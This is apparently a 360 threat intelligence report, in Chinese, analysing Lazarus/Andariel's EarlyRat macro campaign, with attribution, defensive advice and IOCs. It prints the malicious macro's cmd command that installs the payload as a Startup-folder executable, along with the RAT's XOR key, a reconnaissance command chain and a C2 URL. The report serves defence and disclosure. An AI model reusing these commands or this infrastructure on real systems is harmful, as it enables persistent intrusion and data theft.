查看原文
其他

APT-C-26(Lazarus)组织使用EarlyRat的攻击活动分析

高级威胁研究院 360威胁情报中心 2024-03-24

APT-C-26  LazarusAPT-C-26(Lazarus)是一个活跃的APT组织,其下的Andariel子组织自2009年以来一直活跃,主要对位于韩国的实体进行破坏性和以经济动机为驱动的网络攻击。近期,Kaspersky揭示了Andariel组织下新出现的恶意攻击组件——EarlyRat[1]。为深入了解其行为模式,我们对此进行了调查,并利用360安全大脑成功追踪到了EarlyRat的活动踪迹,进一步挖掘其与早期攻击活动的联系。

 一、攻击活动分析  

1.攻击流程分析  

在我们的观察中,疑似攻击者通过Skype发送诱饵文件下载链接,之后用户通过谷歌浏览器下载了含有恶意文档的压缩文件。一旦用户被诱导打开该文件,攻击者则利用伪装成Microsoft信息的技巧,诱使用户启用宏功能。一旦用户上钩,宏将被激活并释放EarlyRat,然后开始窃取用户信息和执行恶意命令。

图1 攻击流程图

2.载荷投递分析  

攻击者以冒充Microsoft的方式设计了诱饵文件,其目的在于诱导用户运行恶意宏代码。这些恶意宏首要任务是将内置二进制数据写入系统临时文件夹,具体路径为 %Temp%\1vqar5tgi51.sak,接着借助cmd来执行以下命令。
/c ping -n 16 226.132.219.125&pushd&forfiles /P %tmp% /S /M 1Vqar5tGI51*.sak /C "cmd /c move /y @file \"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WHealthScanner.exe\"&ping -n 14 74.124.228.148&pushd&\"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WHealthScanner.exe\""
表1 宏代码借助cmd执行命令

攻击者利用命令提示符对特定IP地址(226.132.219.125和74.124.228.148)执行ping操作,并在系统临时文件夹中寻找特定的恶意文件。找到后,文件将被移动并重命名为WHealthScanner.exe,存储在用户的启动文件夹中,以便在每次系统启动时都会运行。这种行为表明攻击者正试图获取持久的系统访问权限,并且该方法具有较高的隐蔽性。

图2 诱饵文件

3.攻击组件分析  

由宏代码投递的恶意二进制文件被命名为EarlyRat[1]。EarlyRat是一个采用PureBasic框架编写的相对简单的远程访问木马(RAT)组件。尽管其设计较为简洁,但其能够高效地执行攻击者下发的命令和执行文件,这意味着攻击者能够利用EarlyRat在受害者的计算机上进行一系列的远程操作,从简单的系统监控到复杂的数据窃取或者更进一步的系统破坏,其灵活性和易用性让EarlyRat成为攻击者的有效工具。
恶意样本使用内置的key(n>t#8;S<)对base64编码数据进行XOR解密得到所需字符串,例如C2地址、请求代理等;

图3 解密字符

然后获取用户系统MAC地址、计算机名和IP地址,通过CRC32校验算法计算出“机器标识ID”;

图4 CRC32计算机器标识ID
对获取的系统IP地址、计算机名、用户名、系统版本和位数用“机器标识ID”进行滚动XOR加密,之后再对加密数据进行base64编码,并将其转化为URL编码数据;

图5 对系统信息进行加密
之后将这些信息发送给远程C2。

图6 窃取信息发送到远程C2
在成功接收到C2返回的数据后,获取“\r\n\r\n”后的数据,并在“%temp%”目录创建文件,将提取的数据写入到文件中;

图7 创建临时文件

图8 将C2数据写入到临时文件
之后会检查数据的第11个字节到第18个字节是否是11到81(十进制),然后使用第19到26个字节作为密钥XOR解密后续加密数据;

图9 数据示例(构造)

图10 解密后续数据
解密的数据可以只有一段,这一段即要执行的命令;

图11 任意命令执行示例
在我们的观察中,攻击者执行了“cmd.exe /c systeminfo & netstat -naop tcp & ipconfig /all & tasklist”命令,通过cmd命令提示符,收集了关于受害者系统的详细信息,网络连接状况,网络接口的配置信息以及当前运行中的所有任务或进程。这可能是为了了解系统环境、识别潜在的攻击矢量,或者寻找用于深度渗透的进一步信息。
如果包含三段数据,则第二段和第三段为文件名和文件数据。其中如果投递的文件是可执行文件,则添加额外的40,000,000字节随机数据。

图12 处理第二和第三段数据代码示例

图13 写入随机数据
同时还会修改新文件属性以防御规避。

图14 修改文件属性

 二、归属研判  

在2022年9月,网络安全公司Cisco揭露了一起严重的网络攻击事件:Lazarus组织在2022年2月至7月期间,运用包括MagicRAT在内的多个恶意组件,对全球范围内的能源供应商进行攻击。在这次攻击中,攻击者利用log4j漏洞作为入侵点,并部署了众多恶意组件。值得注意的是,Cisco在其报告中披露了一个IP地址(40.121.90[.]194),这一地址与我们在分析EarlyRat过程中所发现的C2地址完全一致。

此外,Kaspersky在其报告中指出,EarlyRat是可以通过利用log4j漏洞进行部署的,同时我们在2022年3月发现了攻击者利用EarlyRat的攻击活动,其时间和恶意组件的部署方式与Cisco披露的信息基本符合。基于这些一致性,我们有理由相信我们所发现的利用EarlyRat的攻击活动,正是2022年上半年Lazarus组织发起的大规模行动的一部分。

 三、防范排查建议   

考虑到攻击者疑似采用了通过聊天工具向目标投递恶意压缩文件,进一步通过宏文档释放RAT以窃取用户信息的策略,我们有必要引入一系列预防和检测措施。这些措施旨在加强网络安全防护,遏制此类攻击的成功可能性,以下是我们的一些建议:

1. 聊天工具的安全使用:教育员工或用户,对通过聊天工具接收到的任何未经请求的文件或链接保持警惕,尤其是来自不熟悉的发送者或看起来可疑的文件。

2. 保持浏览器更新:始终确保您的浏览器是最新版本。浏览器的更新往往包含了最新的安全补丁,可以帮助阻止恶意软件的入侵。

3. 下载内容审查:始终谨慎对待所有下载内容,无论它们来自何处。只从可信的来源下载,并在打开任何下载文件之前都进行扫描。

4. 宏的使用:在打开任何包含宏的文档时,应始终保持警惕。最好的策略是默认禁用所有宏,并只在需要且来自可信来源的情况下手动启用。

5. 启动文件夹管理:在启动文件夹搜索WHealthScanner.exe,并使用360安全卫士进行扫描分析。

6. 定期更新和补丁管理:保持所有系统、应用程序和防病毒软件的最新版本,以确保您的网络对最新的安全威胁有所准备。

7. 开展网络安全意识培训:定期进行网络安全培训,使员工了解最新的网络威胁,包括如何识别和处理恶意软件、钓鱼攻击和其他网络安全问题。

8. 定期审计和监控:定期审计和监控网络活动,尤其是对内部和外部数据传输的监控,以便能及时发现不寻常的数据访问或传输行为。

9. 使用专业防病毒软件:使用知名的安全软件,如360安全卫士,可以帮助检测并阻止EarlyRat等恶意软件。


附录 IOC

8031958a3156187fa53490fb98c39afd 

344a7f277f3d7dd2dc0e86f69c3ca49d 

39598b710e44a5d27684dfa463ce5148   

e439f850aa8ead560c99a8d93e472225 

d642c62147fbdee00412c0604a25a58b 

74f1b7a57cd76279ec16b311089995a6 

78e7b9ab205ea31f7eef26de6293f103

http://40.121.90.194/help.php


参考链接

[1]https://www.kaspersky.com/about/press-releases/2023_kaspersky-uncovers-new-malware-family-used-by-andariel-lazarus-subgroup
[2]https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html






360高级威胁研究院

360高级威胁研究院是360数字安全集团的核心能力支持部门,由360资深安全专家组成,专注于高级威胁的发现、防御、处置和研究,曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击,独家披露多个国家级APT组织的高级行动,赢得业内外的广泛认可,为360保障国家网络安全提供有力支撑。   
继续滑动看下一个
向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存